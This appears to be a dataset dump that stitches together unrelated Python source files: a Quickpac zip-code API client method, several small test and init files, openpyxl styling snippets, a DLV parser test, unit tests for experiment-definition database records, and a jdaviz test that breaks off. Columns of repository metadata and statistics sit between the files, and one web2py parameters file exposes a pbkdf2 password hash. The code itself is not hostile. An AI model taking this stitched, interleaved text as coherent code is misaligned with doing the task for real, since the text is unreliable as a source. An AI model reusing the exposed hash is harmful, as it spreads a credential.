### Deliverable zip code * This API checks whether the requested zip code can currently be supplied by Quickpac. * In the event of an error, the 'Error' or 'Warning' property is set with one or more corresponding messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.z_ip_is_deliverable_zip_code_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int zip_code: ZIP code in the range from 1,000 - 9,999.
:return: ZIPIsCurrentResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['zip_code'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method z_ip_is_deliverable_zip_code_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'zip_code' in params:
query_params.append(('zipCode', params['zip_code'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json', 'application/xml', 'text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['Basic'] # noqa: E501
return self.api_client.call_api(
'/ZIP/IsDeliverableZipCode', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ZIPIsCurrentResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41
| 347
| 0.635987
| 1,091
| 8,692
| 4.816682
| 0.171402
| 0.039581
| 0.030828
| 0.027402
| 0.89705
| 0.891722
| 0.891722
| 0.87079
| 0.860894
| 0.860894
| 0
| 0.016488
| 0.281293
| 8,692
| 211
| 348
| 41.194313
| 0.824716
| 0.426254
| 0
| 0.72381
| 1
| 0
| 0.164182
| 0.047128
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.038095
| 0
| 0.152381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6dae0dd1cece4441cb228e477ab3da4bc72d7aec
| 46
|
py
|
Python
|
skypy/supernova/tests/test_import.py
|
ArthurTolley/skypy
|
5621877ada75c667b1af7e665b02a91026f7ef0f
|
[
"BSD-3-Clause"
] | 1
|
2020-12-28T18:00:24.000Z
|
2020-12-28T18:00:24.000Z
|
skypy/supernova/tests/test_import.py
|
ArthurTolley/skypy
|
5621877ada75c667b1af7e665b02a91026f7ef0f
|
[
"BSD-3-Clause"
] | 2
|
2020-12-28T20:14:40.000Z
|
2020-12-28T21:49:27.000Z
|
skypy/supernova/tests/test_import.py
|
ArthurTolley/skypy
|
5621877ada75c667b1af7e665b02a91026f7ef0f
|
[
"BSD-3-Clause"
] | null | null | null |
def test_import():
import skypy.supernova
| 15.333333
| 26
| 0.73913
| 6
| 46
| 5.5
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 46
| 2
| 27
| 23
| 0.868421
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
111d42e6dc3cd0f6f289feea86436bf95b41463c
| 134
|
py
|
Python
|
tracki/src/domain/entities/__init__.py
|
rok-povsic/Tracki
|
f92fec62fa66e87fa6feb509142f09cd548c570a
|
[
"MIT"
] | null | null | null |
tracki/src/domain/entities/__init__.py
|
rok-povsic/Tracki
|
f92fec62fa66e87fa6feb509142f09cd548c570a
|
[
"MIT"
] | null | null | null |
tracki/src/domain/entities/__init__.py
|
rok-povsic/Tracki
|
f92fec62fa66e87fa6feb509142f09cd548c570a
|
[
"MIT"
] | null | null | null |
from tracki.src.domain.entities.category import Category # noqa F401
from tracki.src.domain.entities.shift import Shift # noqa F401
| 44.666667
| 69
| 0.80597
| 20
| 134
| 5.4
| 0.5
| 0.185185
| 0.240741
| 0.351852
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 0.119403
| 134
| 2
| 70
| 67
| 0.864407
| 0.141791
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1154b3960e4c755151899cc26ab8dfaaa1f0dda8
| 92
|
py
|
Python
|
parameters_8000.py
|
wasuaje/web2py5
|
02f310b9526f92c4ec62ab5b0271069a1c101e9f
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
wasuaje/web2py5
|
02f310b9526f92c4ec62ab5b0271069a1c101e9f
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
wasuaje/web2py5
|
02f310b9526f92c4ec62ab5b0271069a1c101e9f
|
[
"BSD-3-Clause"
] | null | null | null |
password="pbkdf2(1000,20,sha512)$addea80690104c89$e64c88b318e761d47ad2b915b38e2af362e3df15"
| 46
| 91
| 0.891304
| 7
| 92
| 11.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.494505
| 0.01087
| 92
| 1
| 92
| 92
| 0.406593
| 0
| 0
| 0
| 0
| 0
| 0.869565
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
febd0ea8f41dc36a7cc485bed62e17ba757e0b86
| 21,828
|
py
|
Python
|
test/test_definition.py
|
gonzalorodrigo/ScSFWorkload
|
2301dacf486df8ed783c0ba33cbbde6e9978c17e
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2019-03-18T18:27:49.000Z
|
2019-03-18T18:27:49.000Z
|
test/test_definition.py
|
gonzalorodrigo/ScSFWorkload
|
2301dacf486df8ed783c0ba33cbbde6e9978c17e
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2020-12-17T21:33:15.000Z
|
2020-12-17T21:35:41.000Z
|
test/test_definition.py
|
gonzalorodrigo/ScSFWorkload
|
2301dacf486df8ed783c0ba33cbbde6e9978c17e
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2021-01-05T08:23:20.000Z
|
2021-01-05T08:23:20.000Z
|
"""
python -m unittest test_definition
"""
from commonLib.DBManager import DB
from orchestration.definition import (ExperimentDefinition,
GroupExperimentDefinition,
DeltaExperimentDefinition)
import datetime
import os
import subprocess
import time
import unittest
class TestExperimentDefinition(unittest.TestCase):
def setUp(self):
self._db = DB(os.getenv("TEST_DB_HOST", "127.0.0.1"),
os.getenv("TEST_DB_NAME", "test"),
os.getenv("TEST_DB_USER", "root"),
os.getenv("TEST_DB_PASS", ""))
def _del_table(self, table_name):
ok = self._db.doUpdate("drop table "+table_name+"")
self.assertTrue(ok, "Table was not created!")
def test_create_table(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
def test_constructor(self):
ed = ExperimentDefinition(
seed="seeeed",
machine="machine",
trace_type="double",
manifest_list=[{"share": 0.2, "manifest": "man1.json"},
{"share":0.8, "manifest": "man2.json"}],
workflow_policy="period",
workflow_period_s=20,
workflow_share=30.0,
workflow_handling="manifest",
subtraces = [100002, 10003],
preload_time_s = 3600*24*3,
workload_duration_s = 3600*24*8,
work_state = "fresher",
analysis_state = "1",
overload_target=2.0,
conf_file="my.conf")
self.assertEqual(ed._experiment_set, "machine-double-m[0.2|man1.json,"
"0.8|man2.json]-period-p20-%30.0-manifest-"
"t[100002,10003]"
"-3d-8d-O2.0-my.conf")
self.assertEqual(ed._name, "machine-double-m[0.2|man1.json,"
"0.8|man2.json]"
"-period-p20-%30.0-manifest-t[100002,10003]-3d-8d-O2.0"
"-my.conf-s[seeeed]")
self.assertEqual(ed._seed, "seeeed")
self.assertEqual(ed._machine, "machine")
self.assertEqual(ed._trace_type, "double")
self.assertEqual(ed._manifest_list, [dict(share=0.2,
manifest="man1.json"),
dict(share=0.8,
manifest="man2.json")])
self.assertEqual(ed._workflow_policy, "period")
self.assertEqual(ed._workflow_period_s, 20)
self.assertEqual(ed._workflow_share, 30.0)
self.assertEqual(ed._workflow_handling, "manifest")
self.assertEqual(ed._subtraces, [100002, 10003])
self.assertEqual(ed._preload_time_s, 3*24*3600)
self.assertEqual(ed._workload_duration_s, 8*24*3600)
self.assertEqual(ed._work_state, "fresher")
self.assertEqual(ed._analysis_state, "1")
self.assertEqual(ed._table_name, "experiment")
self.assertEqual(ed._overload_target,2.0)
self.assertEqual(ed._conf_file, "my.conf")
def test_store_load(self):
ed_old = ExperimentDefinition(
seed="seeeed",
machine="machine",
trace_type="double",
manifest_list=[{"share": 0.2, "manifest": "man1.json"},
{"share":0.8, "manifest": "man2.json"}],
workflow_policy="period",
workflow_period_s=20,
workflow_share=30.0,
workflow_handling="manifest",
subtraces = [100002, 10003],
preload_time_s = 3600*24*3,
workload_duration_s = 3600*24*8,
work_state = "fresher",
analysis_state = "1",
overload_target=2.0,
conf_file="my.conf")
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
trace_id = ed_old.store(self._db)
ed.load(self._db, trace_id)
self.assertEqual(ed._experiment_set, "machine-double-m[0.2|man1.json,"
"0.8|man2.json]-period-p20-%30.0-manifest-"
"t[100002,10003]"
"-3d-8d-O2.0-my.conf")
self.assertEqual(ed._name, "machine-double-m[0.2|man1.json,"
"0.8|man2.json]"
"-period-p20-%30.0-manifest-t[100002,10003]-3d-8d-O2.0"
"-my.conf-s[seeeed]")
self.assertEqual(ed._seed, "seeeed")
self.assertEqual(ed._machine, "machine")
self.assertEqual(ed._trace_type, "double")
self.assertEqual(ed._manifest_list, [dict(share=0.2,
manifest="man1.json"),
dict(share=0.8,
manifest="man2.json")])
self.assertEqual(ed._workflow_policy, "period")
self.assertEqual(ed._workflow_period_s, 20)
self.assertEqual(ed._workflow_share, 30.0)
self.assertEqual(ed._workflow_handling, "manifest")
self.assertEqual(ed._subtraces, [100002, 10003])
self.assertEqual(ed._preload_time_s, 3*24*3600)
self.assertEqual(ed._workload_duration_s, 8*24*3600)
self.assertEqual(ed._work_state, "fresher")
self.assertEqual(ed._analysis_state, "1")
self.assertEqual(ed._table_name, "experiment")
self.assertEqual(ed._overload_target,2.0)
self.assertEqual(ed._conf_file, "my.conf")
def test_get_file_names(self):
ed = ExperimentDefinition(
seed="seeeed",
machine="machine",
trace_type="double",
manifest_list=[{"share": 0.2, "manifest": "man1.json"},
{"share":0.8, "manifest": "man2.json"}],
workflow_policy="period",
workflow_period_s=20,
workflow_share=30.0,
workflow_handling="manifest",
subtraces = [100002, 10003],
preload_time_s = 3600*24*3,
workload_duration_s = 3600*24*8,
work_state = "fresher",
analysis_state = "1")
self.assertEqual(ed.get_trace_file_name(),
"machine-double-m0.2man1.json"
"0.8man2.json"
"-period-p20-30.0-manifest-t10000210003-3d-8d-O0.0"
"-sseeeed.trace")
self.assertEqual(ed.get_qos_file_name(),
"machine-double-m0.2man1.json"
"0.8man2.json"
"-period-p20-30.0-manifest-t10000210003-3d-8d-O0.0"
"-sseeeed.qos")
self.assertEqual(ed.get_users_file_name(),
"machine-double-m0.2man1.json"
"0.8man2.json"
"-period-p20-30.0-manifest-t10000210003-3d-8d-O0.0"
"-sseeeed.users")
def test_get_fresh(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
ed.store(self._db)
ed_2 = ExperimentDefinition()
ed_2.store(self._db)
ed_f = ExperimentDefinition()
ed_f.load_fresh(self._db)
self.assertEqual(ed_f._trace_id, 1)
ed_f_2 = ExperimentDefinition()
ed_f_2.load_fresh(self._db)
self.assertEqual(ed_f_2._trace_id, 2)
def test_get_fresh_pending(self):
self.addCleanup(self._del_table, "experiment")
ExperimentDefinition().create_table(self._db)
ed_1 = ExperimentDefinition(start_date=datetime.datetime(2019,1,1))
trace_id_1=ed_1.store(self._db)
ed_2 = ExperimentDefinition()
trace_id_2=ed_2.store(self._db)
ed_g1= GroupExperimentDefinition(machine="kkk")
ed_g1.add_sub_trace(trace_id_1)
ed_g1.add_sub_trace(trace_id_2)
ed_g1.store(self._db)
ed_g2 = GroupExperimentDefinition()
print(ed_g2._subtraces)
ed_g2.add_sub_trace(trace_id_1)
ed_g2.store(self._db)
one_g=GroupExperimentDefinition()
self.assertTrue(one_g.load_pending(self._db))
self.assertNotEqual(one_g._work_state, "pre_analyzing")
ed_1.upate_state(self._db, "analysis_done")
self.assertTrue(one_g.load_pending(self._db))
self.assertEqual(one_g._work_state, "pre_analyzing")
self.assertEqual(one_g._trace_id, ed_g2._trace_id)
one_g=GroupExperimentDefinition()
self.assertTrue(one_g.load_pending(self._db))
ed_2.upate_state(self._db, "analysis_done")
self.assertTrue(one_g.load_pending(self._db))
self.assertEqual(one_g._work_state, "pre_analyzing")
self.assertEqual(one_g._trace_id, ed_g1._trace_id)
def test_is_it_ready_to_process(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
t1 = ExperimentDefinition()
id1=t1.store(self._db)
t2 = ExperimentDefinition()
id2=t2.store(self._db)
t3 = GroupExperimentDefinition(subtraces=[id1, id2])
t3.store(self._db)
self.assertFalse(t3.is_it_ready_to_process(self._db), "The subtraces"
" are still pending, it should not be possible to"
" process it.")
t1.mark_simulation_done(self._db)
self.assertFalse(t3.is_it_ready_to_process(self._db), "One subtrace"
" is still pending, it should not be possible to"
" process it.")
t2.mark_simulation_done(self._db)
self.assertFalse(t3.is_it_ready_to_process(self._db), "Subtraces "
"have to be analyzed for this the grouped to be "
"ready")
t1.mark_analysis_done(self._db)
t2.mark_analysis_done(self._db)
self.assertTrue(t3.is_it_ready_to_process(self._db), "Subtraces "
"are analyzed. It should be ready")
def test_is_it_ready_to_process_delta(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
t1 = ExperimentDefinition()
id1=t1.store(self._db)
t2 = ExperimentDefinition()
id2=t2.store(self._db)
t3 = DeltaExperimentDefinition(subtraces=[id1, id2])
t3.store(self._db)
self.assertFalse(t3.is_it_ready_to_process(self._db), "The subtraces"
" are still pending, it should not be possible to"
" process it.")
t1.mark_simulation_done(self._db)
self.assertFalse(t3.is_it_ready_to_process(self._db), "One subtrace"
" is still pending, it should not be possible to"
" process it.")
t2.mark_simulation_done(self._db)
self.assertTrue(t3.is_it_ready_to_process(self._db), "Subtraces "
"are genreated, t3, should be ready to run.")
def test_get_fresh_concurrent(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
for i in range(200):
ed.store(self._db)
if os.path.exists("./out.file"):
os.remove("./out.file")
out = open("./out.file", "w")
p = subprocess.Popen(["python", "./fresh_reader.py"], stdout=out)
count = 0
there_are_more=True
ids=[]
while there_are_more:
ed_f = ExperimentDefinition()
there_are_more = ed_f.load_fresh(self._db)
if there_are_more:
ids.append(ed_f._trace_id)
time.sleep(5)
out.flush()
out.close()
out = open("./out.file", "r")
lines = out.readlines()
other_ids=[]
for line in lines:
if "END2" in line:
print("")
text_list=line.split("END2: [")[1]
text_list=text_list.split("]")[0]
other_ids = [int(x) for x in text_list.split(",")]
self.assertGreater(len(ids), 0)
self.assertGreater(len(other_ids), 0)
for id in ids:
self.assertNotIn(id, other_ids)
print(("IDs", ids, other_ids))
def test_mark_simulating(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
my_id=ed.store(self._db)
ed.mark_simulating(self._db, "MyWorker")
now_time=datetime.datetime.now()
new_ed = ExperimentDefinition()
new_ed.load(self._db, my_id)
self.assertEqual(new_ed._work_state, "simulating")
self.assertEqual(new_ed._worker, "MyWorker")
self.assertLess(now_time-new_ed._simulating_start,
datetime.timedelta(10))
def test_mark_simulation_done(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
my_id=ed.store(self._db)
ed.mark_simulation_done(self._db)
now_time=datetime.datetime.now()
new_ed = ExperimentDefinition()
new_ed.load(self._db, my_id)
self.assertEqual(new_ed._work_state, "simulation_done")
self.assertLess(now_time-new_ed._simulating_end,
datetime.timedelta(10))
def test_mark_simulation_failed(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
my_id=ed.store(self._db)
ed.mark_simulation_failed(self._db)
now_time=datetime.datetime.now()
new_ed = ExperimentDefinition()
new_ed.load(self._db, my_id)
self.assertEqual(new_ed._work_state, "simulation_failed")
self.assertLess(now_time-new_ed._simulating_end,
datetime.timedelta(10))
def test_reset_simulating_time(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
my_id=ed.store(self._db)
ed.update_simulating_start(self._db)
ed.update_simulating_end(self._db)
new_ed = ExperimentDefinition()
new_ed.load(self._db, my_id)
self.assertNotEqual(new_ed._simulating_end, None)
self.assertNotEqual(new_ed._simulating_start, None)
ed.reset_simulating_time(self._db)
new_ed.load(self._db, my_id)
self.assertEqual(new_ed._simulating_end, None)
self.assertEqual(new_ed._simulating_start,None)
def test_load_next_ready_for_pass(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
ed_1=ExperimentDefinition()
ed_2=ExperimentDefinition()
ed_3=ExperimentDefinition()
ed_4=ExperimentDefinition()
ed_1._workflow_handling="manifest"
ed_1._work_state="analysis_done"
ed_2._workflow_handling="single"
ed_2._work_state="analysis_done"
ed_3._workflow_handling="multi"
ed_3._work_state="analysis_done"
target_trace_id=ed_1.store(self._db)
ed_2.store(self._db)
ed_3.store(self._db)
#ed_4 should be skipped.
ed_4.store(self._db)
ed_1b=ExperimentDefinition()
ed_2b=ExperimentDefinition()
ed_3b=ExperimentDefinition()
ed_1b._workflow_handling="manifest"
ed_1b._work_state="analysis_done"
ed_2b._workflow_handling="single"
ed_2b._work_state="analysis_done"
ed_3b._workflow_handling="multi"
ed_3b._work_state="analysis_done"
target_trace_id_b=ed_1b.store(self._db)
ed_2b.store(self._db)
ed_3b.store(self._db)
ed.load_next_ready_for_pass(self._db)
self.assertEqual(target_trace_id, ed._trace_id)
ed.load_next_ready_for_pass(self._db)
self.assertEqual(target_trace_id_b, ed._trace_id)
def test_load_next_ready_for_pass_error(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
ed_1=ExperimentDefinition()
ed_2=ExperimentDefinition()
ed_3=ExperimentDefinition()
ed_4=ExperimentDefinition()
ed_1._workflow_handling="manifest"
ed_1._work_state="analysis_done"
ed_2._workflow_handling="multi"
ed_2._work_state="analysis_done"
ed_3._workflow_handling="multi"
ed_3._work_state="analysis_done"
target_trace_id=ed_1.store(self._db)
ed_2.store(self._db)
ed_3.store(self._db)
ed_4.store(self._db)
#ed_1 to ed_4 should be skipped.
ed_1b=ExperimentDefinition()
ed_2b=ExperimentDefinition()
ed_3b=ExperimentDefinition()
ed_1b._workflow_handling="manifest"
ed_1b._work_state="analysis_done"
ed_2b._workflow_handling="single"
ed_2b._work_state="analysis_done"
ed_3b._workflow_handling="multi"
ed_3b._work_state="analysis_done"
target_trace_id_b=ed_1b.store(self._db)
ed_2b.store(self._db)
ed_3b.store(self._db)
ed.load_next_ready_for_pass(self._db)
self.assertEqual(target_trace_id_b, ed._trace_id)
def test_load_next_grouped_ready_for_pass(self):
ed = GroupExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
other=ExperimentDefinition()
other.store(self._db)
subids_1=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="manifest"
subt_1._work_state="analysis_done"
subids_1.append(subt_1.store(self._db))
subids_2=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="single"
subt_1._work_state="analysis_done"
subids_2.append(subt_1.store(self._db))
subids_3=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="single"
subt_1._work_state="analysis_done"
subids_3.append(subt_1.store(self._db))
ed_1=GroupExperimentDefinition()
ed_2=GroupExperimentDefinition()
ed_3=GroupExperimentDefinition()
ed_4=GroupExperimentDefinition()
ed_1._workflow_handling="manifest"
ed_1._work_state="analysis_done"
ed_1._subtraces=subids_1
ed_2._workflow_handling="single"
ed_2._work_state="analysis_done"
ed_2._subtraces=subids_2
ed_3._workflow_handling="multi"
ed_3._work_state="analysis_done"
ed_3._subtraces=subids_3
target_trace_id=ed_1.store(self._db)
ed_2.store(self._db)
ed_3.store(self._db)
#ed_4 should be skipped.
ed_4.store(self._db)
subids_1=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="manifest"
subt_1._work_state="analysis_done"
subids_1.append(subt_1.store(self._db))
subids_2=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="single"
subt_1._work_state="analysis_done"
subids_2.append(subt_1.store(self._db))
subids_3=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="single"
subt_1._work_state="fresh"
subids_3.append(subt_1.store(self._db))
ed_1=GroupExperimentDefinition()
ed_2=GroupExperimentDefinition()
ed_3=GroupExperimentDefinition()
ed_4=GroupExperimentDefinition()
ed_1._workflow_handling="manifest"
ed_1._work_state="analysis_done"
ed_1._subtraces=subids_1
ed_2._workflow_handling="single"
ed_2._work_state="analysis_done"
ed_2._subtraces=subids_2
ed_3._workflow_handling="multi"
ed_3._work_state="analysis_done"
ed_3._subtraces=subids_3
ed_1.store(self._db)
ed_2.store(self._db)
ed_3.store(self._db)
#ed_4 should be skipped.
ed_4.store(self._db)
ed.load_next_ready_for_pass(self._db)
self.assertEqual(target_trace_id, ed._trace_id)
ed._work_state="second_pass_done"
ed.store(self._db)
newEd=GroupExperimentDefinition()
self.assertRaises(ValueError, newEd.load_next_ready_for_pass, self._db)
| 38.094241
| 80
| 0.574995
| 2,523
| 21,828
| 4.629409
| 0.08918
| 0.052911
| 0.045205
| 0.036729
| 0.830993
| 0.811473
| 0.788955
| 0.760873
| 0.755223
| 0.75411
| 0
| 0.040664
| 0.318398
| 21,828
| 573
| 81
| 38.094241
| 0.744388
| 0.006185
| 0
| 0.727079
| 0
| 0.004264
| 0.116887
| 0.025047
| 0
| 0
| 0
| 0
| 0.164179
| 1
| 0.03838
| false
| 0.021322
| 0.014925
| 0
| 0.055437
| 0.006397
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3a308f19f79fb2ed9cc5dcd557ab43105ed854bb
| 1,041
|
py
|
Python
|
default_filled_in_text.py
|
PCSailor/python_openpyxl_dcflog
|
ee10a3cde550b0d76fd033912de32af38d010589
|
[
"MIT"
] | null | null | null |
default_filled_in_text.py
|
PCSailor/python_openpyxl_dcflog
|
ee10a3cde550b0d76fd033912de32af38d010589
|
[
"MIT"
] | null | null | null |
default_filled_in_text.py
|
PCSailor/python_openpyxl_dcflog
|
ee10a3cde550b0d76fd033912de32af38d010589
|
[
"MIT"
] | null | null | null |
''' From Page 11 '''
# NOTE: excerpt from a larger script; `sheet`, `row`, and `col` are assumed to be
# defined earlier in the original file.
from openpyxl.styles import Font, PatternFill

# Yes / No values, size 9, color 696969
sheet.cell(row=row, column=col).value = 'Yes / No'
sheet.cell(row=row, column=col).font = Font(size=9, color='696969')
# ✓ X values, size 8, color DCDCDC
sheet.cell(row=row, column=col).value = '✓ X'
sheet.cell(row=row, column=col).font = Font(size=8, color='DCDCDC')
# %RH, size 8, color 696969
sheet.cell(row=row, column=col).value = '%RH'
sheet.cell(row=row, column=col).font = Font(size=8, color='696969')
# Hz, size 8, color 696969
sheet.cell(row=row, column=col).value = 'Hz'
sheet.cell(row=row, column=col).font = Font(size=8, color='696969')
# D/P, size 8, color 696969
sheet.cell(row=row, column=col).value = 'D/P'
sheet.cell(row=row, column=col).font = Font(size=8, color='696969')
# Colored Cells
# Dark Grey
sheet.cell(row=row, column=col).fill = PatternFill(fgColor='C0C0C0', fill_type='solid')
# Light Grey (note: the source uses the same C0C0C0 fill as the dark grey cell above)
sheet.cell(row=row, column=col).fill = PatternFill(fgColor='C0C0C0', fill_type='solid')
| 41.64
| 89
| 0.618636
| 164
| 1,041
| 3.926829
| 0.231707
| 0.167702
| 0.223602
| 0.279503
| 0.844721
| 0.844721
| 0.844721
| 0.799689
| 0.799689
| 0.684783
| 0
| 0.080097
| 0.208453
| 1,041
| 24
| 90
| 43.375
| 0.699029
| 0.214217
| 0
| 0.416667
| 0
| 0
| 0.098504
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3ae637f7612db14cf67820e0ebe41297e4aa10fe
| 793
|
py
|
Python
|
tests/parser/nonground.query.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/nonground.query.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/nonground.query.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
% This is most similar to nonground.query.3, just without the second
% constraint. We originally failed to process this correctly.
color(red,X) | color(green,X) | color(blue,X) :- node(X).
node("Cosenza").
node("Vienna").
node("Diamante").
redish :- color(red,"Vienna").
dark :- not color(red,"Vienna").
:- redish, not dark.
%:- dark, not redish.
color(X,Y)?
"""
output = """
% This is most similar to nonground.query.3, just without the second
% constraint. We originally failed to process this correctly.
color(red,X) | color(green,X) | color(blue,X) :- node(X).
node("Cosenza").
node("Vienna").
node("Diamante").
redish :- color(red,"Vienna").
dark :- not color(red,"Vienna").
:- redish, not dark.
%:- dark, not redish.
color(X,Y)?
"""
| 21.432432
| 69
| 0.6343
| 112
| 793
| 4.491071
| 0.294643
| 0.095427
| 0.111332
| 0.067594
| 0.978131
| 0.978131
| 0.978131
| 0.978131
| 0.978131
| 0.978131
| 0
| 0.003072
| 0.179067
| 793
| 36
| 70
| 22.027778
| 0.769585
| 0
| 0
| 0.923077
| 0
| 0.076923
| 0.959264
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aafb9eefcc0795d1ec7a0afcfcce812f33d4d209
| 3,841
|
py
|
Python
|
jdaviz/tests/test_subsets.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | 55
|
2019-05-24T18:53:05.000Z
|
2022-03-14T08:45:52.000Z
|
jdaviz/tests/test_subsets.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | 1,105
|
2019-05-09T15:17:35.000Z
|
2022-03-31T21:22:18.000Z
|
jdaviz/tests/test_subsets.py
|
rosteen/jdaviz
|
e02c08d68ef71c5e40600785f46e65e5ae95e236
|
[
"MIT",
"BSD-3-Clause"
] | 49
|
2019-05-07T18:05:42.000Z
|
2022-03-22T15:15:34.000Z
|
import numpy as np
import pytest
from glue.core import Data
from glue.core.roi import RectangularROI, XRangeROI
from numpy.testing import assert_allclose
from regions import RectanglePixelRegion

from jdaviz.app import Application


@pytest.fixture
def jdaviz_app():
    return Application(configuration='cubeviz')


def test_region_from_subset_2d(jdaviz_app):
